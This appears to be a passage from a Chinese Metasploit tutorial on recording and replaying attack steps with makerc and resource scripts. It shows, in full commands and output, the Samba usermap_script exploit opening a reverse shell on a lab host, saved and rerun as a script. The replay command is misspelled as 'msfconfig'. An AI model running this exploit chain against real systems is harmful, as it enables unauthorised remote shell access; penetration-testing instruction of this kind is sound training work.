0x09 录制简单攻击脚本

通过makerc 来实现，就是简单的把键入到终端的命令记录下来，攻击无关的命令也会记录

msf > workspace book
[*] Workspace: book

msf > hosts

Hosts
=====

address         mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----  -------  ---------  -----  -------  ----  --------
192.168.10.123  00:0c:29:86:6d:33        Linux               2.6.X  server
192.168.10.254  00:0c:29:7f:de:c9        Linux               2.6.X  server

msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(multi/samba/usermap_script) > set rhost 192.168.10.254
rhost => 192.168.10.254
msf exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 192.168.10.102:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 5P2uS1mnOkS0zxL6;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "5P2uS1mnOkS0zxL6\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.102:4444 -> 192.168.10.254:54428) at 2018-12-06 08:19:15 -0500

^Z
Background session 1? [y/N]  y
# 执行这个一指令就会把从进入msfconsole的操作全部记录，在记录的文件中把不相关的指令删除就行了
msf exploit(multi/samba/usermap_script) > makerc check_samba.rc
[*] Saving last 14 commands to check_samba.rc ...

查看录制的内容

# cat check_samba.rc
# 脚本中有多余的操作可以自己动手删掉
workspace book
hosts
use exploit/multi/samba/usermap_script
show options
set rhost 192.168.10.254
exploit

如何使用录制的脚本

msfconfig -q -r check_samba.rc

-q 不要显示登陆之后metasploit那一长串花哨的标志
-r 后面接录制的脚本

# 结果如下
[*] Processing check_samba.rc for ERB directives.
resource (check_samba.rc)> workspace book
[*] Workspace: book
resource (check_samba.rc)> hosts

Hosts
=====

address         mac                name  os_name     os_flavor  os_sp  purpose  info  comments
-------         ---                ----  -------     ---------  -----  -------  ----  --------
192.168.10.122  00:0c:29:67:b8:28        Windows XP                    client
192.168.10.123  00:0c:29:86:6d:33        Linux                  2.6.X  server
192.168.10.128  00:0c:29:f7:89:a7        Windows XP                    client
192.168.10.254  00:0c:29:7f:de:c9        Linux                  2.6.X  server

resource (check_samba.rc)> use exploit/multi/samba/usermap_script
resource (check_samba.rc)> show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


resource (check_samba.rc)> set rhost 192.168.10.254
rhost => 192.168.10.254
resource (check_samba.rc)> exploit
[*] Started reverse TCP double handler on 192.168.10.102:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo xQRN0G6H4nZxw9Jr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "xQRN0G6H4nZxw9Jr\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.102:4444 -> 192.168.10.254:56845) at 2018-12-06 08:28:16 -0500

# 这里有已经有了一个目标终端了